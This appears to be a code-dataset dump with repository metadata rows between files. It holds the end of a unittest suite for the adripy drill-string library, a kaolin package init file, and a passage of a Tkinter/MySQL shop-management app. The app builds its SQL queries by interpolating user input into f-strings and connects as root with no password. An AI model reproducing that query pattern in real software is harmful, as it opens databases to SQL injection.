drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE_COLLAR)
# Get the collar from the drill string
collar = drill_string.get_tool('drill_collar')
# Messy way to find the collar in the strings tools list
# and get the number of joints
for tool in drill_string.tools:
if tool['DrillTool'] is collar:
actual_n_joints = tool['Number_of_Joints']
# Set the expected number of joins
expected_n_joints = 2
self.assertEqual(actual_n_joints, expected_n_joints)
def test_read_string_from_file_wrong_case_in_refs(self):
"""Tests that a string file is read correctly when it has a collar in it.
"""
# Read new parameters into the drill string object from a file
drill_string_from_file = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE_WRONG_CASE)
expected_parameters = {
'Units': 'Imperial',
'ModelName': 'test_string_wrong_case',
'OutputName': 'test_string_wrong_case',
'Gravity': 32.187,
'Deviation_Deg': 0.0,
'Adams_Results': 'animation',
'Adams_Graphics': 'off',
'Adams_Requests': 'on',
'Distance_from_Bit': [100.0, 300.0, 500.0],
'SolverDLL': 'adrill_solver',
'Hole_Property_File': '<ExAmPlE_dAtAbAsE>\\holes.tbl\\test_hole.hol',
'Contact_Method': 'Subroutine',
'Cyl_Drag_Coeff': 1.0,
'Hole_Color': 'LtGray',
'Event_Property_File': '<ExAmPlE_dAtAbAsE>\\events.tbl\\test_event.evt'
}
# Remove some keys from the parameters dictionary
drill_string_from_file.parameters.pop('_Distance_from_Bit')
self.assertDictEqual(drill_string_from_file.parameters, expected_parameters)
def test_read_string_from_file_relative_references(self):
"""Tests that the string is read correctly when the file uses relative references.
"""
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Create an event object
event = adripy.DrillEvent(TEST_EVENT_NAME,2000, 3)
event.add_simulation_step(10)
event.add_simulation_step(100)
event.add_ramp('FLOW_RATE', 0, 15, 500)
event.add_ramp('ROTARY_RPM', 15, 15, 60)
event.add_ramp('WOB', 30, 15, 50)
event.add_ramp('ROP', 30, 15, 100)
# Create a solver settings object
solver_settings = adripy.DrillSolverSettings(TEST_SOLVER_SETTINGS_NAME)
# Create a DrillSim object
drill_sim = adripy.DrillSim(drill_string, event, solver_settings, TEST_WORKING_DIRECTORY, TEST_ANALYSIS_NAME)
try:
_drill_string = adripy.DrillString.read_from_file(os.path.join(drill_sim.directory, drill_sim.string_filename))
except FileNotFoundError as err:
self.fail('Failed to read the drill string: ' + traceback.format_exc())
def test_get_tool_first(self):
"""Tests that DrillString.get_tool() returns the correct value.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Define a new stabilizer object
different_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(different_stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
got_tool = drill_string.get_tool('stabilizer')
self.assertEqual(got_tool, self.stabilizer)
def test_get_tool_last(self):
"""Tests that DrillString.get_tool() returns the correct value.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Define a new stabilizer object
different_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(different_stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
got_tool = drill_string.get_tool('stabilizer', index=-1)
self.assertEqual(got_tool, different_stabilizer)
def test_get_tool_1(self):
"""Tests that DrillString.get_tool() returns the correct value.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Define a new stabilizer object
different_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(different_stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
got_tool = drill_string.get_tool('stabilizer', index=0)
self.assertEqual(got_tool, self.stabilizer)
def test_get_tool_2(self):
"""Tests that DrillString.get_tool() returns the correct value.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Define a new stabilizer object
different_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(different_stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
got_tool = drill_string.get_tool('stabilizer', index=1)
self.assertEqual(got_tool, different_stabilizer)
def test_set_pipe_joints_physical(self):
"""Tests that DrillString.set_pipe_joints() correctly
sets the number of joints of physical pipe.
"""
expected_joints = 100
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
drill_string.set_pipe_joints(expected_joints)
actual_joints = drill_string.tools[-2]['Number_of_Joints']
self.assertEqual(actual_joints, expected_joints)
def test_set_pipe_joints_equivalent(self):
"""Tests that DrillString.set_pipe_joints() correctly
sets the number of joints of equivalent pipe.
"""
expected_joints = 100
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
drill_string.set_pipe_joints(expected_joints, equivalent=True)
actual_joints = drill_string.tools[-1]['Number_of_Joints']
self.assertEqual(actual_joints, expected_joints)
def test_get_bha_length(self):
"""Tests that DrillString.get_bha_length() returns the correct length.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.stabilizer, measure='no')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
expected_length = 14.48
actual_length = drill_string.get_bha_length()
self.assertEqual(actual_length, expected_length)
def test_get_bha_length_wrong_case(self):
"""Tests that DrillString.get_bha_length() returns the correct length.
"""
expected_length = 502.393
actual_length = adripy.get_bha_length(TEST_EXISTING_STRING_FILE_WRONG_CASE)
self.assertEqual(actual_length, expected_length)
def test_change_tool_name(self):
"""Tests that changing the name of a :class:`DrillTool` object causes the 'Name' and 'Property_File' values in :attr:`DrillString.tools` to change as well.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.motor, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Get the motor
motor = drill_string.get_tool('motor')
# Rename the motor
expected_tool_name = 'new_motor_name'
motor.rename(expected_tool_name)
# Get the motor as recorded in the drill_string.tools list
actual_tool_name = drill_string.tools[1]['Name']
# Delete the tool file that was created
os.remove(os.path.join(TEST_DATABASE_PATH, 'motors.tbl', f'{expected_tool_name}.mot'))
self.assertEqual(actual_tool_name, expected_tool_name)
def test_change_tool_property_file(self):
"""Tests that changing the name of a :class:`DrillTool` object causes the 'Name' and 'Property_File' values in :attr:`DrillString.tools` to change as well.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.motor, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Get the motor
motor = drill_string.get_tool('motor')
# Rename the motor
expected_tool_name = 'new_motor_name'
expected_tool_propertyfile = os.path.join(f'<{TEST_DATABASE_NAME}>', 'motors.tbl', f'{expected_tool_name}.mot')
motor.rename(expected_tool_name)
# Get the motor as recorded in the drill_string.tools list
actual_tool_propertyfile = drill_string.tools[1]['Property_File']
# Delete the tool file that was created
os.remove(os.path.join(TEST_DATABASE_PATH, 'motors.tbl', f'{expected_tool_name}.mot'))
self.assertEqual(actual_tool_propertyfile, expected_tool_propertyfile)
def tearDown(self):
# Delete test config file
os.remove(TEST_CONFIG_FILENAME)
os.environ['ADRILL_USER_CFG'] = os.path.join(os.environ['USERPROFILE'], '.adrill.cfg')
# Delete string file from test_write_string_to_database()
try:
os.remove(os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str'))
except FileNotFoundError:
pass
# Clear the entire new database
clear_database(TEST_NEW_DATABASE_PATH)
| 45.368944
| 252
| 0.685313
| 4,702
| 36,522
| 5.011484
| 0.063377
| 0.098965
| 0.065354
| 0.084026
| 0.841453
| 0.826897
| 0.811322
| 0.793711
| 0.777627
| 0.757299
| 0
| 0.007198
| 0.227835
| 36,522
| 804
| 253
| 45.425373
| 0.828375
| 0.214337
| 0
| 0.634703
| 0
| 0
| 0.116079
| 0.028358
| 0
| 0
| 0
| 0
| 0.070776
| 1
| 0.079909
| false
| 0.004566
| 0.011416
| 0
| 0.09589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
65e8f15dff65981b5839d35025c1e9404acdcc2d
| 170
|
py
|
Python
|
kaolin/ops/__init__.py
|
priyasundaresan/kaolin
|
ddae34ba5f09bffc4368c29bc50491c5ece797d4
|
[
"ECL-2.0",
"Apache-2.0"
] | 3,747
|
2019-11-13T02:18:16.000Z
|
2022-03-31T21:12:31.000Z
|
kaolin/ops/__init__.py
|
priyasundaresan/kaolin
|
ddae34ba5f09bffc4368c29bc50491c5ece797d4
|
[
"ECL-2.0",
"Apache-2.0"
] | 371
|
2019-11-13T14:50:59.000Z
|
2022-03-22T19:40:06.000Z
|
kaolin/ops/__init__.py
|
priyasundaresan/kaolin
|
ddae34ba5f09bffc4368c29bc50491c5ece797d4
|
[
"ECL-2.0",
"Apache-2.0"
] | 482
|
2019-11-13T05:04:38.000Z
|
2022-03-31T10:20:26.000Z
|
from . import batch
from . import conversions
from . import gcn
from . import mesh
from . import random
from . import reduction
from . import spc
from . import voxelgrid
| 18.888889
| 25
| 0.764706
| 24
| 170
| 5.416667
| 0.416667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188235
| 170
| 8
| 26
| 21.25
| 0.942029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0294deb3f1c9ef598b1a71203e52e7dfa5370845
| 119,350
|
py
|
Python
|
Easy_Dealer_Owner.py
|
Apex-Predator-s/Apex_Predator-s_Repository
|
4f8016b56f7bfeb338233d6b882336c451cb9d0c
|
[
"MIT"
] | null | null | null |
Easy_Dealer_Owner.py
|
Apex-Predator-s/Apex_Predator-s_Repository
|
4f8016b56f7bfeb338233d6b882336c451cb9d0c
|
[
"MIT"
] | null | null | null |
Easy_Dealer_Owner.py
|
Apex-Predator-s/Apex_Predator-s_Repository
|
4f8016b56f7bfeb338233d6b882336c451cb9d0c
|
[
"MIT"
] | null | null | null |
from tkinter import*
from tkinter import ttk
from PIL import ImageTk, Image
from ttkthemes import themed_tk as tk
from PyQt5 import QtWidgets
import os
import mysql.connector
from tkinter import messagebox
import Login_Page
directory_path = os.path.dirname(__file__)
class Owner:
def __init__(self, root, username):
self.root = root
self.username = username
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
start_width = int((screen_width - 1280) / 2)
start_height = int((screen_height - 720) / 2)
self.root.title('Easy Dealer')
self.root.iconbitmap(directory_path + '/images/logo.ico')
self.root.geometry(f'1280x720+{start_width}+{start_height - 30}')
self.root.resizable(False, False)
self.root.config(bg='#1F2026')
def bound_to_mousewheel(event):
showall_canvas.bind_all("<MouseWheel>", on_mousewheel)
def unbound_to_mousewheel(event):
showall_canvas.unbind_all("<MouseWheel>")
def on_mousewheel(event):
showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")
def dashboard_button_clicked():
self.dashboard_button.config(bg='#3C3F4A')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT Full_Name FROM user_table WHERE UserName = "{self.username}"'
my_cursor.execute(query)
fullname = my_cursor.fetchone()[0]
except Exception as e:
print(e)
dashboard_bg_label = Label(self.content_frame, image=self.dashboard_bg_image)
dashboard_bg_label.place(x=-2, y=-2)
welcome_label = Label(self.content_frame, text='WELCOME,', font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='white')
welcome_label.place(x=21, y=14)
name_label = Label(self.content_frame, text=fullname, anchor='w', width=25, font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='#BBBBBB')
name_label.place(x=118, y=14)
recent_sells_label = Label(self.content_frame, text='Recent sells,', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
recent_sells_label.place(x=21, y=65)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM sell ORDER BY Sell_ID DESC LIMIT 3'
my_cursor.execute(query)
sell_details = my_cursor.fetchall()
# sell_details = []
if len(sell_details) >= 1:
customer_id = sell_details[0][1]
product_name = sell_details[0][5]
selling_price = sell_details[0][3]
date_of_sell = sell_details[0][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=45, y=309)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=45, y=334)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=45, y=359)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=45, y=384)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=90, y=340)
if len(sell_details) >= 2:
customer_id = sell_details[1][1]
product_name = sell_details[1][5]
selling_price = sell_details[1][3]
date_of_sell = sell_details[1][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=179)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=204)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=229)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=254)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=210)
if len(sell_details) >= 3:
customer_id = sell_details[2][1]
product_name = sell_details[2][5]
selling_price = sell_details[2][3]
date_of_sell = sell_details[2][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=440)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=465)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=490)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=515)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=470)
except Exception as e:
print(e)
def show_products_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#3C3F4A')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
for widget in self.content_frame.winfo_children():
widget.destroy()
def bound_to_mousewheel(event):
showall_canvas.bind_all("<MouseWheel>", on_mousewheel)
def unbound_to_mousewheel(event):
showall_canvas.unbind_all("<MouseWheel>")
def on_mousewheel(event):
showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")
temp_frame = Frame(self.content_frame, width=960, height=514, bg='#292B37', border=None)
temp_frame.place(x=2, y=115)
showall_canvas = Canvas(temp_frame, width=960, height=514, bg='#292B37')
vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
vertical_bar.pack(side=RIGHT, fill='y')
showall_canvas.config(yscrollcommand=vertical_bar.set)
final_frame = Frame(temp_frame, width=960, height=514, bg='#292B37')
showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
final_frame.bind('<Enter>', bound_to_mousewheel)
final_frame.bind('<Leave>', unbound_to_mousewheel)
border_hide_frame1 = Frame(self.content_frame, bg='#292B37', height=7, width=958)
border_hide_frame1.place(x=6, y=111)
border_hide_frame2 = Frame(self.content_frame, bg='#292B37', height=638, width=7)
border_hide_frame2.place(x=-1, y=111)
border_hide_frame3 = Frame(self.content_frame, bg='#292B37', height=519, width=7)
border_hide_frame3.place(x=959, y=112)
showall_canvas.config(yscrollcommand=vertical_bar.set)
showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
show_product_bg_frame = Frame(self.content_frame, bg='#292B37', height=107, width=958)
show_product_bg_frame.place(x=2, y=9)
show_employees_bg_label = Label(show_product_bg_frame, image=self.show_employees_bg_image, bg='#292B37')
show_employees_bg_label.place(x=-2, y=-2)
show_product_label = Label(show_product_bg_frame, text='SHOW PRODUCT INFORMATION', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
show_product_label.place(x=50, y=40)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM product;'
my_cursor.execute(query)
products = my_cursor.fetchall()
for i in range(len(products)):
employee_frame = Frame(final_frame, bg='#292B37', height=340, width=958)
employee_frame_bg_label = Label(employee_frame, image=self.show_employee_bg_image, bg='#292B37')
employee_frame_bg_label.place(x=-2, y=-2)
product_name_label = Label(employee_frame, text=products[i][1], font=('Arial Rounded MT', 17, 'bold'), bg='#292B37', fg='white')
product_name_label.place(x=90, y=68)
product_price_label = Label(employee_frame, text='$ ' + str(products[i][3]), font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='white')
product_price_label.place(x=90, y=101)
product_id_label = Label(employee_frame, text=f'Product ID : {products[i][0]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_label.place(x=90, y=153)
product_category_label = Label(employee_frame, text=f'Category : {products[i][2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_category_label.place(x=90, y=201)
dop_label = Label(employee_frame, text=f'Date of purchase : {products[i][4]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dop_label.place(x=90, y=249)
employee_frame.pack()
except Exception as e:
print(e)
def add_products_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#3C3F4A')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
def add():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
product_name = product_name_edit.get()
product_id = product_id_edit.get()
purchase_price = purchase_price_edit.get()
product_category = product_category_edit.get()
dop = dop_edit.get()
if product_name == '' or product_id == '' or purchase_price == '' or product_category == '' or dop == '':
alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'INSERT INTO Product VALUES ("{product_id}", "{product_name}", "{product_category}", {purchase_price}, "{dop}");'
my_cursor.execute(query)
db.commit()
db.close()
alert_label.config(text='Product has been added successfully..', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
product_name_edit.delete(0, 'end')
product_id_edit.delete(0, 'end')
purchase_price_edit.delete(0, 'end')
product_category_edit.delete(0, 'end')
dop_edit.delete(0, 'end')
except Exception as e:
alert_label.config(text='Sorry! Invalid input..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in self.content_frame.winfo_children():
widget.destroy()
self.add_products_bg_label = Label(self.content_frame, image=self.add_products_bg_image)
self.add_products_bg_label.place(x=-2, y=-2)
add_product_label = Label(self.content_frame, text='ADD PRODUCT', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
add_product_label.place(x=50, y=50)
product_name_label = Label(self.content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_name_label.place(x=106, y=184)
product_id_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_label.place(x=106, y=240)
purchase_price_label = Label(self.content_frame, text='Purchase Price', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
purchase_price_label.place(x=106, y=307)
product_category_label = Label(self.content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_category_label.place(x=106, y=369)
dop_label = Label(self.content_frame, text='Date Of Purchase', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dop_label.place(x=106, y=432)
product_name_edit = Entry(self.content_frame, text='Product Name', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
product_name_edit.place(x=281, y=184)
product_id_edit = Entry(self.content_frame, text='Product ID', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
product_id_edit.place(x=281, y=245)
purchase_price_edit = Entry(self.content_frame, text='Purchase Price', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
purchase_price_edit.place(x=281, y=307)
product_category_edit = Entry(self.content_frame, text='Product Category', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
product_category_edit.place(x=281, y=369)
dop_edit = Entry(self.content_frame, text='Date Of Purchase', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
dop_edit.place(x=281, y=432)
add_product_button = Button(self.content_frame, cursor='hand2', image=self.add_products_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=add)
add_product_button.place(x=722, y=523)
alert_label = Label(self.content_frame, width=30, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=106, y=523)
product_name_edit.delete(0, 'end')
product_id_edit.delete(0, 'end')
purchase_price_edit.delete(0, 'end')
product_category_edit.delete(0, 'end')
dop_edit.delete(0, 'end')
def update_products_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#3C3F4A')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
def search():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
def update():
product_name = product_name_edit.get()
product_id = product_id_edit.get()
purchase_price = purchase_price_edit.get()
product_category = product_category_edit.get()
dop = dop_edit.get()
if searched_product_id != product_id:
alert_label.config(text='Oops! Invalid input..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
elif product_name == '' or product_id == '' or purchase_price == '' or product_category == '' or dop == '':
alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'UPDATE product SET Product_Name = "{product_name}", Product_Category = "{product_category}", Price = {float(purchase_price)}, DOP = "{dop}" WHERE Product_ID = "{searched_product_id}";'
my_cursor.execute(query)
db.commit()
db.close()
for widget in self.update_content_frame.winfo_children():
